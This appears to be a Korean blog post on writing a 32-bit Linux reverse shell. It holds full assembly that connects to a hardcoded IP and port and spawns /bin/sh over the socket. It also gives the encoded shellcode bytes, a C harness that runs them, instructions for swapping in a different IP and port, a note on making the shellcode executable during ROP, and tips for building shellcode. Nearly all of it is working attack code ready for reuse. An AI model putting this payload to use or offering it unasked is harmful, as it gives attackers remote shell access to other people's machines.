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System/Linux

Reverse Shellcode

Tribal 2017. 8. 12. 03:17

어셈 코드(32bit 어셈)

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int main(void) {
    asm(
        "xor %eax, %eax\n\t"
        "xor %ebx, %ebx\n\t"
        "xor %ecx, %ecx\n\t"
        "push %ecx\n\t"        //IPPROTO_IP
        "inc %ecx\n\t"
        "push %ecx\n\t"        //SOCK_STREAM
        "inc %ecx\n\t"
        "push %ecx\n\t"        //AF_INET
        "mov %esp, %ecx\n\t"
        "inc %ebx\n\t"
        "mov $0x66, %al\n\t"
        "int $0x80\n\t"        //socket()
        "add $0x0c, %esp\n\t"
        "mov %eax, %esi\n\t"
        "xor %eax, %eax\n\t"
        "push %eax\n\t"
        "push %eax\n\t"        //zero
        "mov $0x8034a8c0, %eax\n\t"
        "push %eax\n\t"        //ip
        "xor %eax, %eax\n\t"
        "mov $0x4648, %ax\n\t"
        "push %ax\n\t"        //port
        "xor %eax, %eax\n\t"
        "mov $0x02, %al\n\t"
        "push %ax\n\t"        //AF_INET
        "mov %esp, %edx\n\t"
        "mov $0x10, %al\n\t"
        "push %eax\n\t"        //sizeof(struct sockaddr_in)
        "push %edx\n\t"        //struct sockaddr_in
        "mov %esp, %ecx\n\t"
        "push %esi\n\t"        //fd
        "mov %esp, %ecx\n\t"
        "mov $0x03, %bl\n\t"
        "mov $0x66, %al\n\t"
        "int $0x80\n\t"        //connect()
        "add $0x1c, %esp\n\t"
        "xor %ecx, %ecx\n\t"
        "mov %ecx, %ebx\n\t"
        "mov %esi, %ebx\n\t"
        "xor %eax, %eax\n\t"
        "mov $0x3f, %al\n\t"
        "int $0x80\n\t"        //dup2(4,0)
        "inc %ecx\n\t"
        "xor %eax, %eax\n\t"
        "mov $0x3f, %al\n\t"
        "int $0x80\n\t"        //dup2(4,1)
        "inc %ecx\n\t"
        "xor %eax, %eax\n\t"
        "mov $0x3f, %al\n\t"
        "int $0x80\n\t"        //dup2(4,2)
        "xor %eax, %eax\n\t"
        "xor %edx, %edx\n\t"
        "push %eax\n\t"
        "push $0x68732f2f\n\t"
        "push $0x6e69622f\n\t"  //"/bin//sh
        "mov %esp, %ebx\n\t"
        "push %eax\n\t"
        "push %ebx\n\t"
        "mov %esp, %ecx\n\t"
        "mov $0x0b, %al\n\t"
        "int $0x80\n\t"        //execve()
        "add $0x10, %esp\n\t"
       );
    return 0;
}
 
cs


쉘코드 테스트

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char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x43"
            "\xb0\x66\xcd\x80\x83\xc4\x0c\x89\xc6\x31\xc0\x50\x50\xb8"
            "\xc0\xa8\x34\x80\x50\x31\xc0\x66\xb8\x48\x46\x66\x50\x31"
            "\xc0\xb0\x02\x66\x50\x89\xe2\xb0\x10\x50\x52\x89\xe1\x56"
            "\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x83\xc4\x1c\x31\xc9\x89"
            "\xcb\x89\xf3\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f"
            "\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\x31\xc0\x31\xd2\x50"
            "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
            "\x89\xe1\xb0\x0b\xcd\x80";
 
void main() {
    void(*shell)() = (void *)sc;    
    shell();
}
 
cs


- 필요에 따라 ip와 port 부분의 2바이트, 4바이트 상수 값을 수정

- ROP 시, mprotect()나 mmap()을 이용해 실행 권한을 주면 실행 가능



쉘코드 제작 팁

  1. 익숙하면 바로 어셈으로 작성해도 되지만, 아니라면 우선 C언어로 작성하고자 하는 코드 작성
  2. 컴파일 후, strace를 통해 실행
  3. 자신이 작성한 함수 부분을 찾은 후, 이용된 시스템 콜 함수 확인
    (찾기 어렵다면 시작과 끝 부분에 printf 같은 출력 함수를 통해 출력되는 부분)
  4. 시스템 콜 테이블(32bit, http://syscalls.kernelgrok.com/)에서 시스템 콜 넘버(eax 값) 확인
  5. 시스템 콜 호출 인터럽트는 0x80, 따라서 eax에 시스템 콜 넘버를 채운 후, int 0x80을 호출
  6. 함수의 인자 채우는 방법
    • 함수의 인자가 포인터 : 스택에 push를 통해 값 들을 채워주고, mov esp, reg로 스택 주소 획득
      (2중 포인터라면 얻은 주소를 Stack에 push한 후, 한 번 더)
    • 함수의 인자가 상수 : mov $상수, reg
  7. 4바이트 레지스터에 1바이트 상수 등을 넣으면 NULL이 붙을 수 밖에 없기 때문에 주의!
    ex) ( mov $0x01, %eax   ==   mov $0x00000001, %eax )
    => ( xor eax, eax & mov $0x01, al ) 처럼 변경
  8. 어렵다면 쉘코드 만드는 과정을 많이 볼수록 좋음


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